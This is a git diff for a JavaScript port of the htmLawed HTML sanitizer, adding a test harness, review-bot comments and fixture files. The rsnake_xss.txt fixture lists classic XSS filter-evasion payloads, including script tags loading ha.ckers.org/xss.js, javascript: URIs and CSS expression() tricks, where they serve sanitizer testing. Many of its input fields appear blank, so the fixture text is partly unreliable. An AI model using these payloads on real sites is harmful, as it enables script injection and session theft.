diff --git a/htmLawed-test.js b/htmLawed-test.js
index c89eaa7..e4b06ca 100644
--- a/htmLawed-test.js
+++ b/htmLawed-test.js
@@ -1,3 +1,24 @@
const fs = require('fs');
const htmLawed = require('./htmLawed.c.js');
-console.log(htmLawed.sanitize(fs.readFileSync(process.argv[2], { encoding: 'utf8' }), { safe: 1 }));
+
+var out1 = htmLawed.sanitize(fs.readFileSync('htmLawed_TESTCASE.txt', { encoding: 'utf8' }), { safe: 1, keep_bad: 1 });
+var check1 = fs.readFileSync('htmLawed_TESTCASE_out.htm', { encoding: 'utf8' });
+if (out1 == check1)
+ console.log("[TESTCASE.txt] OK");
+else
+{
+ console.log("[TESTCASE.txt] NOT OK, see htmLawed_TESTCASE_bad.htm");
+ fs.writeFileSync('htmLawed_TESTCASE_bad.htm', out1, { encoding: 'utf8' });
+}
+
+var tests = fs.readFileSync('rsnake_xss.txt', { encoding: 'utf8' });
+var m;
+while ((m = /^(\d+)\.\s*([^\n]+)\n\nInput code »\n([\s\S]*?)\n\nOutput code »\n([\s\S]*?)\n\n/.exec(tests)))
+{
+ var output = htmLawed.sanitize(m[3], { safe: 1, keep_bad: 1 }).trim();
+ if (output === m[4])
+ console.log("["+m[1]+"] "+m[2]+": OK");
+ else
+ console.log("["+m[1]+"] "+m[2]+": NOT OK\n"+m[4]+"\n vs \n"+output);
+ tests = tests.substr(m[0].length);
+}
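Review bot: The harness reports failures only on stdout and never sets a non-zero exit status, so test-htmLawed.sh (the hunk at the bottom of this diff, which drops the script's argument) cannot distinguish a failing run from a passing one; add `process.exitCode = 1;` in both NOT OK branches. The rsnake loop also ends silently at the first entry whose layout does not match the regex exactly, so every case after it is skipped without any message — after the `while`, check what is left, e.g. `if (tests.trim() !== '') { console.log('unparsed remainder: ' + tests.slice(0, 80)); process.exitCode = 1; }`, and ideally print how many cases actually ran. Minor: the fixture paths are resolved against the current working directory rather than the script's own directory (`path.join(__dirname, 'htmLawed_TESTCASE.txt')`), `out1 == check1` should be `===`, and `substr` is deprecated in favour of `slice`.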
diff --git a/htmLawed.js b/htmLawed.js
index d25de23..49dcc21 100644
--- a/htmLawed.js
+++ b/htmLawed.js
@@ -161,8 +161,8 @@ var htmLawed = module.exports =
t = htmLawed._strtr(t, { "\x01": '', "\x02": '', "\x03": '&', "\x04": '<', "\x05": '>' });
if (C.tidy)
t = htmLawed.hl_tidy(t, C.tidy, C.parent);
- return t;
// eof
+ return t;
},
hl_attrval: function(a, t, p)
{
@@ -208,10 +208,10 @@ var htmLawed = module.exports =
return (r.length > 0 ? r.join(s) : (p['default'] || 0));
// eof
},
- hl_bal: function(t, perf, intag)
+ hl_bal: function(t, keep_bad, intag)
{
- if (perf === undefined)
- perf = 1;
+ if (keep_bad === undefined)
+ keep_bad = 1;
// balance tags
// by content
var cont = {};
@@ -271,7 +271,7 @@ var htmLawed = module.exports =
// intag sets allowed child
intag = ((el.F[intag] && intag != '#pcdata') || el.O[intag]) ? intag : 'div';
if (cont.E[intag])
- return (!perf ? '' : htmLawed.replace(//g, '>'));
+ return (!keep_bad ? '' : htmLawed.replace(//g, '>'));
var inOk = getCont(intag);
var ok = {}, q = [], ql; // q = seq list of open non-empty ele
var _ob = '';
@@ -421,13 +421,13 @@ var htmLawed = module.exports =
delete cont.I['ins'];
}
// bad tags, & ele content
- if (e && (perf == 1 || (ok['#pcdata'] && (perf == 3 || perf == 5))))
+ if (e && (keep_bad == 1 || (ok['#pcdata'] && (keep_bad == 3 || keep_bad == 5))))
_ob += '<'+s+e+a+'>';
if (x !== '' && x !== null)
{
if (x.trim().length > 0 && ((ql && cont.B[p]) || (cont.B[intag] && !ql))) // FIXME trim
_ob += '
'+x+'
';
- else if (perf < 3 || ok['#pcdata'])
+ else if (keep_bad < 3 || ok['#pcdata'])
_ob += x;
else if (x.indexOf("\x02\x04") >= 0)
{
@@ -435,10 +435,10 @@ var htmLawed = module.exports =
for (var _i = 0; _i < x.length; _i++)
{
var v = x[_i];
- _ob += v.substr(0, 2) == "\x01\x02" ? v : (perf > 4 ? v.replace(/\S+/g, '') : '');
+ _ob += v.substr(0, 2) == "\x01\x02" ? v : (keep_bad > 4 ? v.replace(/\S+/g, '') : '');
}
}
- else if (perf > 4)
+ else if (keep_bad > 4)
_ob += x.replace(/\S+/g, '');
}
}
diff --git a/htmLawed_TESTCASE_out.htm b/htmLawed_TESTCASE_out.htm
new file mode 100644
index 0000000..906f663
--- /dev/null
+++ b/htmLawed_TESTCASE_out.htm
@@ -0,0 +1,450 @@
+/*
+htmLawed_TESTCASE.txt, 27 February 2016
+htmLawed 1.1.22, 5 March 2016
+Copyright Santosh Patnaik
+Dual licensed with LGPL 3 and GPL 2+
+A PHP Labware internal utility - http://www.bioinformatics.org/phplabware/internal_utilities/htmLawed
+*/
+
+This file has UTF-8-encoded text with both correct and incorrect/malformed HTML/XHTML code snippets to test htmLawed (test cases/samples). The entire text may also be used as a unit.
+
+************************************************
+when viewing this file in a web browser, set the
+character encoding to Unicode/UTF-8
+************************************************
+
+--------------------- start --------------------
+
+Try different $config and $spec values. Some text even when filtered in will not be displayed in a rendered web-page
+
+Attributes
+
+Xml:lang: , ,
+Standard, predefined value, or empty attribute: , ,
+Required: ,
+Quote & space variation: a , a , a
+Invalid: a
+Duplicated: a
+Deprecated: a ,
+Casing:
+Custom:
+Data-*: a
+Admin-restricted?:
+
+Attribute values
+
+Duplicate ID value: , ,
+(try 'my_' for prefix)
+Double-quotes in value: , ,
+(try filter for CSS expression)
+CSS expression :
+Other: ,
+(try 'maxlen', 'maxval', etc., for 'input' in '$spec')
+
+Blockquotes
+
+abc
+
+abc
def
+
+abcdef
ghi
+
+x
<!-- comment -->QQQ
+
+x<!-- comment -->
QQQ
x
+
+(try with blockquote parent)
+
+CDATA sections
+
+Special characters inside: <![CDATA[ ]]> ]]>, <![CDATA[ 3 < 4 > 3.5, & 4 > 4 ]]>
+Normal: <![CDATA[ check ]]>, CDATA follows:<![CDATA[ check ]]>
+Malformed: <![cdata check ]]>, < ![CDATA check ]]>, <![CDATA check ]]>, < ![CDATA check ] ]>
+Invalid: >CDATA in tag content , <![CDATA[ check ]]>text not allowed
+
+Complex-1: deprecated elements
+
+
+The PHP software script used for this web-page webpage is htmLawedTest.php , from PHP Labware .
+
+
+Complex-2: deprecated attributes
+
+
+
+
+
+
+
+
+
+
+
+ First item
+
+
+
+
+
+Complex-3: embed, object, area
+
+<object width="425" height="350"><param name="movie" value="http://www.youtube.com/v/ls7gi1VwdIQ" /></param><embed src="http://www.youtube.com/v/ls7gi1VwdIQ" type="application/x-shockwave-flash" width="425" height="350"></embed></object>
+
+<embed src="http://www.youtube.com/v/ls7gi1VwdIQ" type="application/x-shockwave-flash" width="425" height="350"></embed>
+
+<object data="1.gif" type="image/gif" usemap="#map1">
+navigate the site: 1 | 3 | 4
+
+ </object>
+
+<param name="name" />value</param>
+
+<object id="obj1">
+ <param name="param1" />
+ <object id="obj2">
+ <param name="param2" />
+ </object>
+</object>
+
+Complex-4: nested and other tables
+
+
+PCDATA wrong:
+Missing tr:
+
+Complex-5: pseudo, disallowed or non-HTML tags
+
+(Try different 'keep_bad' values)
+<*> Pseudotags <*>
+<xml>Non-HTML tag xml</xml>
+
+Disallowed tag p
+
+
+
+Elements
+
+Unbalanced: check </em>
+Non-XHTML:
+Malformed: < a href=""></a>, , , , < /a>, < a href=""> , , , <imgsrc="s" alt="a" />
+Invalid: <image src="s" alt="a" />
+Empty: , </img>, text</img>
+Content invalid: 1 2 </a>
+Content invalid?: (try setting 'form' as parent)
+Casing:
+Check for tidy: </div> </div> </div>hi
+
+Entities
+
+Special: & 3 < 2 & 5>4 and j >i >a & i<j>a
+Padding: B B f f  
+Malformed: & #x27;, &x27;, ' &TILDE;, &tilde
+Invalid: , �, , �, , &bad;
+Discouraged characters: , „, ,
+Context: '>', <?
+Casing: ', ', &TILDE;, ˜
+
+(also check named-to-numeric and hexdec-to-decimal, and vice versa, conversions)
+
+Format
+
+Valid but ill-formatted: text <!-- comment -->
+text <!--
+A c o m m e n t -->
+<script>
+ <![CDATA[
+ code
+ ]]>
+</script><!-- comment --><![CDATA[ cdata ]]> text</b> text<pre id="none">p r e</pre>
+ text text <hr />
+text tex t
+text t e x t
+ text t e x t
+
+text t e x t
+<script>script</script>
+
+
p r e <!-- comment -->
+
+ pre
+
+
+
+(try to compact or beautify)
+
+Forms
+
+(note nesting of 'form', missing required attributes, etc.)
+ </form>
+
+B: C:
+(try each of these lines separately)
+what
+
what
+(try with container as div and as form)
+
c
a b <script>s</script>
+
+
HTML comments (also CDATA)
+
+
Script inside: <!--[if gte IE 4]>
+<SCRIPT>alert('XSS');</SCRIPT>
+<![endif]-->
+
Special characters inside: <!-- <![CDATA check ]]> -->, <!-- 3 < 4 > 3.5, & 4 > 4 -->, <!-- che--ck -->, <!--[if !IE]> <-->c <!--> <![endif]-->
+Normal: <!-- check -->, <!--check -->, comment:<!-- check --> <!-- check -->, <table><!-- check --><tr><td>text not allowed</td></tr></table>
+Malformed: <![cdata check ]]>, < ![CDATA check ]]>, < ![CDATA check ] ]>
+Invalid: >comment in tag content , <!--check-->
+
+
HTML5
+
+
figure and figcaption: <figure>
<figcaption>Caption for the awesome picture</figcaption></figure>
+
article: A B
<article>
C </article><article>
E F
G
</article>
+
meter :
Heat <meter min="100" max="200" value="150">150</meter>.
+
datalist :
<datalist id="b"><option value="c"><option value="d"></datalist>
+
+
Ins-Del
+
+(depending on context, these elements can be of either block or inline type)
+
<div>block
</ins></p>d
+
+Lists
+
+Invalid character data :
+
Definition list :
a badfirst one b second
+
Definition list, close-tags omitted :
a badfirst one b second
+
Definition lists, nested :
+ T1
+ D1
+ T2
+ D2t1 d1 t2 d2
+ T3
+ D3
+ T4
+ D4t1 d1
+
+
Definition lists, nested, close-tags omitted :
+ T1
+ D1
+ T2
+ D2t1 d1 t2 d2
+ T3
+ D3
+ T4
+ D4t1 d1
+
+
Nested :
+ l1
+ l2lo1 lo2
+ l3
+ l4lo3 lo4lo5
+
+
Nested, directly :
+ l1
+ <ol>l2</ol>
+ l3
+
+
Nested, close-tags omitted :
+ l1
+ l2lo1 lo2
+ l3
+ l4lo3 lo4lo5
+
+
Complex :
+
<script></script>
+
+
+
+
+
+
+ </li></ul>
+</td></tr></table></li></ol>
+Menu :
+ <button type="button">New...</button>
+ <button type="button">Cut...</button>
+
+
+Microdata
+
+
+I am
X but people call me
Y .
+Find me at
www.xy.com
+
+
+Microsoft Word
+
+Proprietary tag : <o:p> </o:p>
+XML declaration : <?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" />
+XML-invalid character code-point (may not replicate) : “Where is he?” asked both Mary – the one so lovely – and Jane.
+
+Nesting
+
+Block or inline a : text
<div>hi</div>
+
+Non-English text-1
+
+Inscrieţi-vă acum la a Zecea Conferinţă Internaţională
+გთხოვთ ახლავე გაიაროთ რეგისტრაცია
+večjezično računalništvo
+อ.อ่าง
+Зарегистрируйтесь сейчас
+на Десятую Международную Конференцию по
+(this file should have utf-8 encoding; some characters may not be displayed because of missing fonts, etc.)
+
+Non-English text-2: entities
+
+用统一码
+გთხოვთ
+Inscreva-se agora para a Décima Conferência Internacional Sobre O Unicode, realizada entre os dias 10 e 12 de março de 1997 em Mainz
+na Alemanha.
+
+Ruby
+
+(need compatible browser)
+
+
+ 斎
+ 藤
+ 信
+ 男
+
+
+ さい
+ とう
+ のぶ
+ お
+
+
+ W3C Associate Chairman
+
+
+
+ WWW
+ ( World Wide Web )
+
+
+ A
+ ( aaa )
+
+
+
+Tables
+
+Omitted closing tags:
+
+
+h1c1 h1c2
+
+r1c1 r1c2
+ r2c1 r2c2
+
+Nested, omitted closing tags:
+
+
+h1c1 h1c2
+
+r1c1 r1c2
+
+
+h1c1 h1c2
+
+r1c1 r1c2
+ r2c1 r2c2
+
+ r2c1 r2c2
+
+
+Tag transformation
+Font element intended as 'inline' element: hi
+Font element intended as 'block' element: <div>hi
</span></div>
+Font element intended as 'block' element: <div>hi
QQQ
</span></div>
+
+Tidy
+White-space handling: abc def ghi abc def ghi
+
+URLs
+
+Relative and absolute: , , , , , ,
+(try base URL value of 'http://a.com/b/')
+CSS URLs:
,
,
,
,
+Double URLs: b
+Anti-spam: (try regex for 'http://a.com', etc.) , , , , , , ,
+Soft-hyphen: ídisc
+
+XSS
+
+
+'';!--"<xss>=&{()}
+
+
+
+
+test
+
+<div style="javascript:alert('xss');"></div>
+<div style="background-image:url(denied:javascript:alert('xss'));"></div>
+<div style="background-image:url("denied:javascript:alert('xss')" );"></div>
+<!--[if gte IE 4]><script>alert('xss');</script><![endif]-->
+<script a=">" src="http://ha.ckers.org/xss.js"></script>
+<div style="background-image: url('denied:js:xss')"></div>
+test
+Bad IE7: x
+Opera: link
+Bad IE7: xxx
+Bad IE7: xxx
+Bad IE7: xxx
+Bad IE7: xxx
+Bad IE7: xxx
+Bad IE7: xxx
+Bad IE7: xxx
+Bad IE7: xxx
+Bad IE7: xxx
+Bad IE7: xxx
+Bad IE7: xxx
+Bad IE7: xxx
+Bad IE7: xxx
+Bad IE7: x
+Bad IE7: x
+Bad IE7: x
+Bad IE7: x
+Bad IE7: exp/*x
+Bad IE7: hi
+Bad IE7: hi
+Bad IE7: test
+Bad IE7: hi
+Bad IE7: hi
+
+<h6>Other</h6>
+
+3 < 4
+3 > 4
+ > 3
+<._.> hi!
+<<< ALERT >>>
+<![if !vml]> some stuff <![endif]>
+<?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" />
+<uml:ns ns = "urn:www">
+<uml:ns ns = 'urn:www'>
+if(13<age AND 21>age){say 'teen'}
+age >51 and a smoking history of >51 pack-years was
+age > 51 and a smoking history of >51 pack-years was
+age <51 and a smoking history of <51 pack-years <b>was</b>
+age < 51 and a smoking history of < 51 pack-years was
+age >51 and a smoking history of >51 pack-years
+age > 51 and a smoking history of >51 pack-years
+age <51 and a smoking history of <51 pack-years</b>
+age < 51 and a smoking history of < 51 pack-years
+
\ No newline at end of file
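Review bot: This fixture ends without a trailing newline (the marker at the end of the hunk) while htmLawed-test.js compares it byte-for-byte against the sanitizer's output, so any editor or formatter that appends a final newline will turn every run into NOT OK with no visible difference in the dumped file; comparing `trimEnd()`-normalised strings on both sides, or stating that the file must keep the exact bytes the sanitizer emits, would make this robust. Nothing in the commit records how the file was produced — the comment block at the top is carried over from the input and names the test-case file, not the implementation that generated the expected output; if it was created by running the current sanitizer it only pins today's behaviour, including any result that is not actually safe, rather than verifying it. A one-line provenance note in htmLawed-test.js, e.g. `// htmLawed_TESTCASE_out.htm: output of <implementation/version>, reviewed against the PHP reference on <date>`, would let the next reviewer judge what the snapshot proves.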
diff --git a/rsnake_xss.txt b/rsnake_xss.txt
new file mode 100644
index 0000000..d047315
--- /dev/null
+++ b/rsnake_xss.txt
@@ -0,0 +1,642 @@
+1. XSS Locator
+
+Input code »
+';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>
+
+Output code »
+';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
+
+2. XSS Quick Test
+
+Input code »
+'';!--"=&{()}
+
+Output code »
+'';!--"<XSS>=&{()}
+
+3. SCRIPT w/Alert()
+
+Input code »
+
+
+Output code »
+<SCRIPT>alert('XSS')</SCRIPT>
+
+4. SCRIPT w/Source File
+
+Input code »
+
+
+Output code »
+<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
+
+5. SCRIPT w/Char Code
+
+Input code »
+
+
+Output code »
+<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
+
+6. DIV background-image 1
+
+Input code »
+
+
+Output code »
+
+
+7. DIV background-image 2
+
+Input code »
+
+
+Output code »
+
+
+8. DIV expression
+
+Input code »
+
+
+Output code »
+
+
+9. IFRAME
+
+Input code »
+
+
+Output code »
+<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
+
+10. INPUT Image
+
+Input code »
+
+
+Output code »
+
+
+11. IMG w/JavaScript Directive
+
+Input code »
+
+
+Output code »
+
+
+12. IMG No Quotes/Semicolon
+
+Input code »
+
+
+Output code »
+
+
+13. IMG Dynsrc
+
+Input code »
+
+
+Output code »
+
+
+14. IMG Lowsrc
+
+Input code »
+
+
+Output code »
+
+
+15. IMG Embedded commands 1
+
+Input code »
+
+
+Output code »
+
+
+16. IMG Embedded commands 2
+
+Input code »
+Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
+
+Output code »
+Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
+
+17. IMG STYLE w/expression
+
+Input code »
+exp/*
+
+Output code »
+exp/*<XSS STYLE='no\xss:noxss("*//*");
+xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
+
+18. IMG w/VBscript
+
+Input code »
+
+
+Output code »
+
+
+19. LAYER
+
+Input code »
+
+
+Output code »
+<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
+
+20. Livescript
+
+Input code »
+
+
+Output code »
+
+
+21. US-ASCII encoding
+
+Input code »
+%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
+
+Output code »
+%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
+
+22. Mocha
+
+Input code »
+
+
+Output code »
+
+
+23. OBJECT
+
+Input code »
+
+
+Output code »
+<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
+
+24. OBJECT w/Embedded XSS
+
+Input code »
+
+
+Output code »
+<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name="url" value="javascript:alert(" /></OBJECT>
+
+25. Embed Flash
+
+Input code »
+
+
+Output code »
+<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
+
+26. OBJECT w/Flash 2
+
+Input code »
+a="get";
b="URL("";
c="javascript:";
d="alert('XSS');")";
+eval(a+b+c+d);
+
+Output code »
+a="get";
b="URL("";
c="javascript:";
d="alert('XSS');")";
+eval(a+b+c+d);
+
+27. STYLE
+
+Input code »
+
+
+Output code »
+<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
+
+28. STYLE w/Comment
+
+Input code »
+
+
+Output code »
+
+
+29. STYLE w/Anonymous HTML
+
+Input code »
+
+
+Output code »
+<XSS STYLE="xss:expression(alert('XSS'))">
+
+30. TABLE
+
+Input code »
+
+
+Output code »
+
+
+31. TD
+
+Input code »
+
+
+Output code »
+
+
+32. XML namespace
+
+Input code »
+
+
+XSS
+
+
+Output code »
+<HTML xmlns:xss>
+<?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">
+<xss:xss>XSS</xss:xss>
+</HTML>
+
+33. XML data island w/CDATA
+
+Input code »
+]]>
+
+
+Output code »
+<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
+</C></X></xml>
+
+34. XML data island w/comment
+
+Input code »
+
+
+
+Output code »
+<XML ID="xss"> cript:alert('XSS')"> </XML>
+
+
+35. XML (locally hosted)
+
+Input code »
+
+
+
+Output code »
+<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>
+
+
+36. XML HTML+TIME
+
+Input code »
+
+
+
+
+
+Output code »
+<HTML><BODY>
+<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
+<?import namespace="t" implementation="#default#time2">
+<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert('XSS')</SCRIPT>"> </BODY></HTML>
+
+37. Commented-out Block
+
+Input code »
+
+
+Output code »
+<!--[if gte IE 4]>
+<SCRIPT>alert('XSS');</SCRIPT>
+<![endif]-->
+
+38. Rename .js to .jpg
+
+Input code »
+
+
+Output code »
+<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
+
+39. SSI
+
+Input code »
+
+
+Output code »
+<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
+
+40. PHP
+
+Input code »
+ echo('alert("XSS")'); ?>
+
+Output code »
+<? echo('<SCR)';
+echo('IPT>alert("XSS")</SCRIPT>'); ?>
+
+41. JavaScript Includes
+
+Input code »
+
+
+Output code »
+
+
+42. Case Insensitive
+
+Input code »
+
+
+Output code »
+
+
+43. HTML Entities
+
+Input code »
+
+
+Output code »
+
+
+44. Grave Accents
+
+Input code »
+
+
+Output code »
+
+
+45. Image w/CharCode
+
+Input code »
+
+
+Output code »
+
+
+46. UTF-8 Unicode Encoding
+
+Input code »
+
+
+Output code »
+
+
+47. Long UTF-8 Unicode w/out Semicolons
+
+Input code »
+
+
+Output code »
+
+
+48. DIV w/Unicode
+
+Input code »
+
+
+Output code »
+
+
+49. Hex Encoding w/out Semicolons
+
+Input code »
+
+
+Output code »
+
+
+50. Embedded Tab
+
+Input code »
+
+
+Output code »
+
+
+51. Embedded Encoded Tab
+
+Input code »
+
+
+Output code »
+
+
+52. Embedded Newline
+
+Input code »
+
+
+Output code »
+
+
+53. Embedded Carriage Return
+
+Input code »
+
+
+Output code »
+
+
+54. Multiline w/Carriage Returns
+
+Input code »
+
+
+Output code »
+
+
+55. Spaces/Meta Chars
+
+Input code »
+
+
+Output code »
+
+
+56. Non-Alpha/Non-Digit
+
+Input code »
+
+
+Output code »
+<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+
+57. Non-Alpha/Non-Digit Part 2
+
+Input code »
+
+
+Output code »
+<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
+
+58. No Closing Script Tag
+
+Input code »
+
+
+Output code »
+<<SCRIPT>alert("XSS");//<</SCRIPT>
+
+63. Malformed IMG Tags
+
+Input code »
+
">
+
+Output code »
+
<SCRIPT>alert("XSS")</SCRIPT>">
+
+64. No Quotes/Semicolons
+
+Input code »
+
+
+Output code »
+<SCRIPT>a=/XSS/
+alert(a.source)</SCRIPT>
+
+65. Evade Regex Filter 1
+
+Input code »
+
+
+Output code »
+<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+
+66. Evade Regex Filter 2
+
+Input code »
+
+
+Output code »
+<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+
+67. Evade Regex Filter 3
+
+Input code »
+
+
+Output code »
+<SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+
+68. Evade Regex Filter 4
+
+Input code »
+
+
+Output code »
+<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+
+69. Evade Regex Filter 5
+
+Input code »
+
+
+Output code »
+<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+
+70. Filter Evasion 1
+
+Input code »
+PT SRC="http://ha.ckers.org/xss.js">
+
+Output code »
+<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+
+71. Filter Evasion 2
+
+Input code »
+
+
+Output code »
+<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+
+72. Mixed Encoding
+
+Input code »
+
XSS
+
+Output code »
+
XSS
+
+73. JavaScript Link Location
+
+Input code »
+
XSS
+
+Output code »
+
XSS
diff --git a/test-htmLawed.sh b/test-htmLawed.sh
index 8a1452e..ec549dd 100644
--- a/test-htmLawed.sh
+++ b/test-htmLawed.sh
@@ -2,4 +2,4 @@
# php -r 'require "htmLawed.php"; print htmLawed::sanitize(file_get_contents("test_xss.txt"), array("safe" => 1));' > test_php.htm
node_modules/.bin/eslint --rulesdir eslint-plugin-no-regex-dot htmLawed.js
node_modules/.bin/babel htmLawed.js > htmLawed.c.js
-nodejs htmLawed-test.js test_xss.txt
+nodejs htmLawed-test.js
diff --git a/test_php.htm b/test_php.htm
deleted file mode 100644
index 22e8411..0000000
--- a/test_php.htm
+++ /dev/null
@@ -1,42 +0,0 @@
-
-'';!--"=&{()}
-
-
-
-
-
test
-
-
-
-
-<!--[if gte IE 4]>alert('xss');<![endif]-->
-" src="http://ha.ckers.org/xss.js">
-Bad in PHP version without safe: " ";alert(window.location.href);//>
-
-test
-Bad IE7: x
-Opera: link
-Bad IE7: xxx
-Bad IE7: xxx
-Bad IE7: xxx
-Bad IE7: xxx
-Bad IE7: xxx
-Bad IE7: xxx
-Bad IE7: xxx
-Bad IE7: xxx
-Bad IE7: xxx
-Bad IE7: xxx
-Bad IE7: xxx
-Bad IE7: xxx
-Bad IE7: xxx
-Bad IE7: x
-Bad IE7: x
-Bad IE7: x
-Bad IE7: x
-Bad IE7: exp/*x
-Bad IE7: hi
-Bad IE7: hi
-Bad IE7: test
-Bad IE7: hi
-Bad IE7: hi
-
\ No newline at end of file
diff --git a/test_xss.txt b/test_xss.txt
deleted file mode 100644
index 0f13cbb..0000000
--- a/test_xss.txt
+++ /dev/null
@@ -1,44 +0,0 @@
-
-'';!--"
=&{()}
-
-
-
-
-test
-
-
-
-
-
-
-Bad in PHP version without safe:
-
-test
-Bad IE7: x
-Opera: link
-Bad IE7: xxx
-Bad IE7: xxx
-Bad IE7: xxx
-Bad IE7: xxx
-Bad IE7: xxx
-Bad IE7: xxx
-Bad IE7: xxx
-Bad IE7: xxx
-Bad IE7: xxx
-Bad IE7: xxx
-Bad IE7: xxx
-Bad IE7: xxx
-Bad IE7: xxx
-Bad IE7: x
-Bad IE7: x
-Bad IE7: x
-Bad IE7: x
-Bad IE7: exp/*x
-Bad IE7: hi
-Bad IE7: hi
-Bad IE7: test
-Bad IE7: hi
-Bad IE7: hi